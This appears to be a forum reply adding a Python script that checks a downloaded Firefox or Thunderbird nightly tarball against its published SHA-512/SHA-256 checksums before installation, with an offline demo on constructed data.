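Both the Thunderbird and the Firefox walkthroughs above fetch the tarball over plain http and link it into /usr/bin without checking what actually arrived. The Python below is an added example (not the page’s own commands and not Mozilla’s code) of the check to do first: it verifies the archive’s size and its SHA-512 or SHA-256 digest against the .checksums file published next to each nightly build. It assumes that file’s four-column layout of digest, algorithm, size and path; the sample archive and the checksum lines in demo() are constructed so that it runs offline.

```python
"""Verify a downloaded Mozilla tarball before it gets symlinked into /usr/bin.

Added example for the Thunderbird and Firefox nightly posts; not code from the
page or from Mozilla. Assumes the four-column layout of the ".checksums" files
published next to the nightly builds, one entry per line:
<hex digest> <algorithm> <size in bytes> <path>.
The sample archive and checksum lines in demo() are constructed, not real data.
"""
import hashlib
import os
import tempfile

ACCEPTED = ("sha512", "sha256")  # md5 and sha1 entries are ignored on purpose


def parse_checksums(text: str) -> dict:
    """Map file basename -> list of (algorithm, size, digest). Lines without
    exactly four fields or with a non-numeric size are skipped, not trusted."""
    entries = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 4 or not fields[2].isdigit():
            continue
        digest, algo, size, path = fields
        entries.setdefault(os.path.basename(path), []).append(
            (algo.lower(), int(size), digest.lower())
        )
    return entries


def file_digest(path: str, algo: str) -> str:
    """Stream the file through hashlib so large archives do not sit in RAM."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_download(path: str, checksums_text: str) -> bool:
    """True only when the file's size and its strongest accepted digest both
    match a published entry. A file with no sha512/sha256 entry fails closed."""
    candidates = parse_checksums(checksums_text).get(os.path.basename(path), [])
    for algo in ACCEPTED:
        for entry_algo, size, digest in candidates:
            if entry_algo != algo:
                continue
            if os.path.getsize(path) != size:
                return False
            return file_digest(path, algo) == digest
    return False


def demo() -> dict:
    """Offline run against a constructed 'tarball' and constructed checksum lines."""
    name = "firefox-20.0a1.en-US.linux-i686.tar.bz2"
    data = b"constructed stand-in for the real tarball\n" * 64
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, name)
        with open(path, "wb") as f:
            f.write(data)
        good = "%s sha512 %d linux-i686/en-US/%s\n" % (
            hashlib.sha512(data).hexdigest(), len(data), name)
        weak_only = "%s md5 %d %s\n" % (hashlib.md5(data).hexdigest(), len(data), name)
        results = {
            "good_file": verify_download(path, good),
            "weak_digest_only": verify_download(path, weak_only),
            "wrong_file_listed": verify_download(path, good.replace(name, "other.tar.bz2")),
        }
        with open(path, "ab") as f:  # simulate tampering in transit: one extra byte
            f.write(b"\x00")
        results["tampered_file"] = verify_download(path, good)
    return results


if __name__ == "__main__":
    print(demo())
```

Fetch the .checksums file itself over https (the http URL in the post protects neither file) and refuse to extract, let alone symlink, the archive if verify_download() returns False. A digest check only proves the archive matches what the server listed; it is still the untrusted-nightly build the post warns about, so the profile backup step above stays mandatory.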

Regards.

Andy